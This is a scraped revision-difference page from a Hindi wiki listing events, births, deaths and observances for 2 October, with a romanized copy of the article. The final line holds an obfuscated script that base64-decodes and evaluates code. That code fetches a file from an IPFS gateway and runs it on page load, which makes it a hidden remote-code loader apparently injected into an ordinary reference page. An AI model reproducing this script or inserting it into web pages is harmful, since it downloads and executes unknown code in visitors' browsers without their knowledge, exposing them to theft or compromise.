Difference between revisions of "2 अक्टूबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(16 intermediate revisions by 4 users not shown)
Line 5: Line 5:
 
==2 अक्टूबर की महत्त्वपूर्ण घटनाएँ==
 
==2 अक्टूबर की महत्त्वपूर्ण घटनाएँ==
 
* 1492 - [[ब्रिटेन]] के किंग हेनरी सप्तम ने [[फ्रांस]] पर आक्रमण किया।
 
* 1492 - [[ब्रिटेन]] के किंग हेनरी सप्तम ने [[फ्रांस]] पर आक्रमण किया।
* [[1924]] - [[राष्ट्रसंघ]] को शक्तिशाली बनाने के उद्देश्य से लाया गया जेनेवा प्रस्ताव 1924 महासभा द्वारा स्वीकृत हुआ किंतु बाद में उसकी पुष्टि नहीं हुई।
+
* [[1924]] - राष्ट्रसंघ को शक्तिशाली बनाने के उद्देश्य से लाया गया जेनेवा प्रस्ताव 1924 महासभा द्वारा स्वीकृत हुआ किंतु बाद में उसकी पुष्टि नहीं हुई।
 
* [[1951]] - [[श्यामा प्रसाद मुखर्जी]] ने [[भारतीय जनसंघ]] की स्थापना की।
 
* [[1951]] - [[श्यामा प्रसाद मुखर्जी]] ने [[भारतीय जनसंघ]] की स्थापना की।
 
* [[1952]] - सामुदायिक विकास कार्यक्रम की शुरूआत हुई।
 
* [[1952]] - सामुदायिक विकास कार्यक्रम की शुरूआत हुई।
 
* [[1961]] - [[बम्बई]] (अब [[मुंबई]]) में शिपिंग कारपोरेशन ऑफ इंडिया का गठन।
 
* [[1961]] - [[बम्बई]] (अब [[मुंबई]]) में शिपिंग कारपोरेशन ऑफ इंडिया का गठन।
* [[1971]] - तत्कालीन [[राष्ट्रपति]] [[वी.वी. गिरि]] ने गांधी सदन के नाम से प्रसिद्ध बिड़ला हाउस देश को समर्पित किया।
+
* [[1971]] - तत्कालीन [[राष्ट्रपति]] [[वी.वी. गिरि]] ने गांधी सदन के नाम से प्रसिद्ध बिड़ला हाउस देश को समर्पित किया। यहीं पर [[महात्मा गांधी]] की हत्या हुई थी।
यहीं पर [[महात्मा गांधी]] की हत्या हुई थी।
 
 
* [[1982]] - तेहरान में बम विस्फोट से 60 मरे, 700 घायल।
 
* [[1982]] - तेहरान में बम विस्फोट से 60 मरे, 700 घायल।
 
* [[1985]] - दहेज निषेधाज्ञा संशोधन अधिनियम अस्तित्व में आया।
 
* [[1985]] - दहेज निषेधाज्ञा संशोधन अधिनियम अस्तित्व में आया।
* [[1988]] - कोरिया के सिओल में 24वें [[ओलंपिक खेल|ओलंपिक खेलों]] का समापन।
+
* [[1988]] -  
 +
**कोरिया के सिओल में 24वें [[ओलंपिक खेल|ओलंपिक खेलों]] का समापन।
 
** [[तमिलनाडु]] में मंडपम और पम्बन के बीच समुद्र के ऊपर सबसे लंबा पुल खुला।
 
** [[तमिलनाडु]] में मंडपम और पम्बन के बीच समुद्र के ऊपर सबसे लंबा पुल खुला।
 
* [[2000]] - [[रूस]] के [[राष्ट्रपति]] ब्लादिमीर पुतिन [[भारत]] की चार दिवसीय यात्रा [[दिल्ली]] पहुँचे।  
 
* [[2000]] - [[रूस]] के [[राष्ट्रपति]] ब्लादिमीर पुतिन [[भारत]] की चार दिवसीय यात्रा [[दिल्ली]] पहुँचे।  
Line 22: Line 22:
 
* [[2007]] - उत्तर व दक्षिण कोरिया के बीच दूसरी शिखर बैठक सम्पन्न हुई।
 
* [[2007]] - उत्तर व दक्षिण कोरिया के बीच दूसरी शिखर बैठक सम्पन्न हुई।
 
* [[2012]] - नाइजीरिया में बंदूकधारियों ने 20 छात्रों की हत्या की।
 
* [[2012]] - नाइजीरिया में बंदूकधारियों ने 20 छात्रों की हत्या की।
 +
 
==2 अक्टूबर को जन्मे व्यक्ति==
 
==2 अक्टूबर को जन्मे व्यक्ति==
* [[1975]] - [[के. कामराज]] - [[भारत रत्न]] सम्मानित स्वतंत्रता सेनानी, राजनेता, [[तमिलनाडु]] के [[मुख्यमंत्री]]  
+
* [[1997]] - [[लवलीना बोरगोहेन]] - भारतीय मुक्केबाज़ खिलाडी हैं।
* [[1974]] - [[प्रीतम सिवाच]] - भारतीय महिला [[हॉकी]] टीम की पूर्व कप्तान।
+
* [[1985]] - [[भव्या लाल]] - नासा में भारतीय मूल की अमेरिकी वैज्ञानिक हैं।
 +
* [[1979]] - [[हंगपन दादा]] - '[[अशोक चक्र]]' से सम्मानित [[भारतीय सेना]] के जांबाज सैनिक थे।
 +
* [[1967]] - [[अर्देम पटापौटियन]] - [[अमेरिका]] के प्रसिद्ध आणविक जीव विज्ञानी, तंत्रिका वैज्ञानिक हैं।
 +
* [[1933]] - [[शंकर शेष]] - [[हिन्दी]] के प्रसिद्ध नाटककार तथा सिनेमा कथा लेखक थे।
 +
* [[1974]] - [[प्रीतम सिवाच]] - भारतीय महिला [[हॉकी]] टीम की पूर्व कप्तान
 
* [[1869]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता
 
* [[1869]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता
* ]]1898]] - [[प्रजापति मिश्र]] - बिहार के प्रमुख गाँधीवादी रचनात्मक कार्यकर्ता और स्वतंत्रता सेनानी थे।
+
* [[1898]] - [[प्रजापति मिश्र]] - बिहार के प्रमुख गाँधीवादी रचनात्मक कार्यकर्ता और स्वतंत्रता सेनानी  
 
* [[1904]] - [[लालबहादुर शास्त्री]] - [[भारत]] के दूसरे [[प्रधानमंत्री]]
 
* [[1904]] - [[लालबहादुर शास्त्री]] - [[भारत]] के दूसरे [[प्रधानमंत्री]]
 
* [[1942]] - [[आशा पारेख]] - प्रसिद्ध फ़िल्म अभिनेत्री
 
* [[1942]] - [[आशा पारेख]] - प्रसिद्ध फ़िल्म अभिनेत्री
 
* [[1924 ]] - [[तपन सिन्हा]] - प्रसिद्ध फ़िल्म निर्देशक
 
* [[1924 ]] - [[तपन सिन्हा]] - प्रसिद्ध फ़िल्म निर्देशक
 +
* [[1901]] - [[गोकुल लाल असावा]] - देश की स्वतंत्रता के लिए योगदान करने वाले क्रांतिकारियों में से एक थे।
 +
* [[1900]] - [[लीला नाग]] - प्रसिद्ध बंगाली पत्रकार और महिला क्रांतिकारी थीं।
 +
* [[1891]] - [[विनायक पांडुरंग करमरकर]] - [[भारत]] के प्रसिद्ध मूर्तिकार थे।
 +
 
==2 अक्टूबर को हुए निधन==
 
==2 अक्टूबर को हुए निधन==
 
* [[1906]] - [[राजा रवि वर्मा]] - विख्यात चित्रकार
 
* [[1906]] - [[राजा रवि वर्मा]] - विख्यात चित्रकार
* [[1964]] - [[राजकुमारी अमृत कौर]] - [[भारत]] की एक प्रख्यात गांधीवादी, स्वतंत्रता सेनानी और एक सामाजिक कार्यकर्ता।
+
* [[1964]] - [[राजकुमारी अमृत कौर]] - [[भारत]] की एक प्रख्यात गांधीवादी, स्वतंत्रता सेनानी और सामाजिक कार्यकर्ता
* [[1975]] -  [[के. कामराज]] - [[भारत रत्न]] सम्मानित स्वतंत्रता सेनानी, राजनेता, तमिलनाडु के मुख्यमंत्री।
+
* [[1975]] -  [[के. कामराज]] - [[भारत रत्न]] सम्मानित स्वतंत्रता सेनानी, राजनेता, तमिलनाडु के मुख्यमंत्री
* [[1982]] - [[सी. डी. देशमुख]], [[ब्रिटिश शासन]] के अधीन आई.सी.एस. अधिकारी और स्वतंत्रता के बाद [[भारत]] के तीसरे वित्त मंत्री।
+
* [[1982]] - [[सी. डी. देशमुख]], [[ब्रिटिश शासन]] के अधीन आई.सी.एस. अधिकारी और स्वतंत्रता के बाद [[भारत]] के तीसरे वित्त मंत्री
  
 
==2 अक्टूबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==2 अक्टूबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* [[अन्तर्राष्ट्रीय अहिंसा दिवस]] (महात्मा गांधी जयन्ती)
 
* [[अन्तर्राष्ट्रीय अहिंसा दिवस]] (महात्मा गांधी जयन्ती)
 
* लाल बहादुर शास्त्री जयन्ती
 
* लाल बहादुर शास्त्री जयन्ती
 +
* [[वन्यजीव सप्ताह]] ([[2 अक्टूबर]] से [[8 अक्टूबर]])
 +
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
[http://www.univarta.com/history-of-the-02-october/today-in-history/news/641101.html#1yyPPyUtDMLrparW.99 univarta.com]
 
[http://www.univarta.com/history-of-the-02-october/today-in-history/news/641101.html#1yyPPyUtDMLrparW.99 univarta.com]

Latest revision as of 09:22, 16 October 2022


gregori kailandar ke anusar 2 aktoobar varsh ke chalisavean saptah ka 275 vaan (lip varsh mean yah 276 vaan) din hai. sal mean abhi aur 90 din shesh haian.

2 aktoobar ki mahattvapoorn ghatanaean

  • 1492 - briten ke kiang henari saptam ne phraans par akraman kiya.
  • 1924 - rashtrasangh ko shaktishali banane ke uddeshy se laya gaya jeneva prastav 1924 mahasabha dvara svikrit hua kiantu bad mean usaki pushti nahian huee.
  • 1951 - shyama prasad mukharji ne bharatiy janasangh ki sthapana ki.
  • 1952 - samudayik vikas karyakram ki shurooat huee.
  • 1961 - bambee (ab muanbee) mean shipiang karaporeshan aauph iandiya ka gathan.
  • 1971 - tatkalin rashtrapati vi.vi. giri ne gaandhi sadan ke nam se prasiddh bi dala haus desh ko samarpit kiya. yahian par mahatma gaandhi ki hatya huee thi.
  • 1982 - teharan mean bam visphot se 60 mare, 700 ghayal.
  • 1985 - dahej nishedhajna sanshodhan adhiniyam astitv mean aya.
  • 1988 -
    • koriya ke siol mean 24vean olanpik kheloan ka samapan.
    • tamilanadu mean mandapam aur pamban ke bich samudr ke oopar sabase lanba pul khula.
  • 2000 - roos ke rashtrapati bladimir putin bharat ki char divasiy yatra dilli pahuanche.
  • 2001 - 19 deshoan ke sangathan nato ne afaganistan par hamale ke lie hari jhandi di.
  • 2003 - hangari ke pradhanamantri pitar maidagese bharat ki yatra par aye.
  • 2004 - sanyukt rashtr suraksha parishad ne kaangoan mean 5900 sainik bhejane ka prastav manjoor kiya.
  • 2006 - dakshin afrika ne paramanu eedhan apoorti mamale par bharat ko samarthan dene ka phaisala kiya.
  • 2007 - uttar v dakshin koriya ke bich doosari shikhar baithak sampann huee.
  • 2012 - naijiriya mean bandookadhariyoan ne 20 chhatroan ki hatya ki.

2 aktoobar ko janme vyakti

2 aktoobar ko hue nidhan

2 aktoobar ke mahattvapoorn avasar evan utsav

bahari k diyaan

univarta.com



sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>